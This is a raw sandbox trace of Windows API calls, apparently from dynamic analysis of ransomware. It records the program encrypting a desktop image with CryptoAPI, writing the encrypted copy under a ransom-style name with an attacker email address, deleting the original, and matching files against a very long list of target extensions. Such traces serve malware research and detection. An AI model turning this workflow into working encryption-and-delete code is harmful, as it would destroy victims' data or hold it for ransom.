xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".bmp") returned=".bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0181.422] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0181.423] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0181.423] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\7umfwwk.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\7umfwwk.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0181.427] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x159b9, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x159b9, lpOverlapped=0x0) returned 1
	[0181.431] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.431] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcabc0) returned 1
	[0181.433] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.433] CryptCreateHash (in: hProv=0xfcabc0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0181.433] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.433] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0181.433] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.433] CryptDeriveKey (in: hProv=0xfcabc0, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0181.433] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.433] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x159b9, dwBufLen=0x159b9 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x159c0) returned 1
	[0181.435] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.436] RtlMoveMemory (in: Destination=0xff2b48, Source=0xfdd180, Length=0x159b9 | out: Destination=0xff2b48) 
	[0181.436] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.436] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff2b48*, pdwDataLen=0x18bc0c*=0x159b9, dwBufLen=0x159c0 | out: pbData=0xff2b48*, pdwDataLen=0x18bc0c*=0x159c0) returned 1
	[0181.439] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.439] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0181.439] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.440] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0181.440] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.440] CryptReleaseContext (hProv=0xfcabc0, dwFlags=0x0) returned 1
	[0181.440] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.440] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0181.441] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.441] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0181.442] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\7umfwwk.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 83
	[0181.442] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\7umfwwk.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\7umfwwk.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0181.443] WriteFile (in: hFile=0x388, lpBuffer=0xff2b48*, nNumberOfBytesToWrite=0x159c0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xff2b48*, lpNumberOfBytesWritten=0x18c068*=0x159c0, lpOverlapped=0x0) returned 1
	[0181.449] CloseHandle (hObject=0x388) returned 1
	[0181.449] CloseHandle (hObject=0x384) returned 1
	[0181.449] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\7umfwwk.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\7umfwwk.bmp")) returned 1
	[0181.458] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\7umfwwk.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\7umfwwk.bmp")) returned 0
	[0181.458] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8752c200, ftCreationTime.dwHighDateTime=0x1d9750e, ftLastAccessTime.dwLowDateTime=0xc59fd340, ftLastAccessTime.dwHighDateTime=0x1d97699, ftLastWriteTime.dwLowDateTime=0xc59fd340, ftLastWriteTime.dwHighDateTime=0x1d97699, nFileSizeHigh=0x0, nFileSizeLow=0xc98, dwReserved0=0x0, dwReserved1=0x0, cFileName="AYy4Qge5AXlLKTEj45b.ods", cAlternateFileName="AYY4QG~1.ODS")) returned 1
	[0181.458] lstrcmpW (lpString1="AYy4Qge5AXlLKTEj45b.ods", lpString2="..") returned 1
	[0181.459] lstrcmpW (lpString1="AYy4Qge5AXlLKTEj45b.ods", lpString2=".") returned 1
	[0181.459] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0181.459] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="AYy4Qge5AXlLKTEj45b.ods" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\AYy4Qge5AXlLKTEj45b.ods") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\AYy4Qge5AXlLKTEj45b.ods"
	[0181.459] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\AYy4Qge5AXlLKTEj45b.ods") returned 53
	[0181.459] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0181.459] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\AYy4Qge5AXlLKTEj45b.ods", cchLength=0x35 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\ayy4qge5axllktej45b.ods") returned 0x35
	[0181.459] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.460] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\ayy4qge5axllktej45b.ods", lpSrch="help_decrypt_your_files") returned 0x0
	[0181.460] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\ayy4qge5axllktej45b.ods" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\ayy4qge5axllktej45b.ods") returned="c:\\users\\rdhj0cnfevzx\\desktop\\ayy4qge5axllktej45b.ods"
	[0181.460] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\ayy4qge5axllktej45b.ods") returned 53
	[0181.460] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.460] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.460] StrStrW (lpFirst=".ods", lpSrch=".") returned=".ods"
	[0181.460] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.461] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ods") returned=".ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0181.461] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0181.461] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
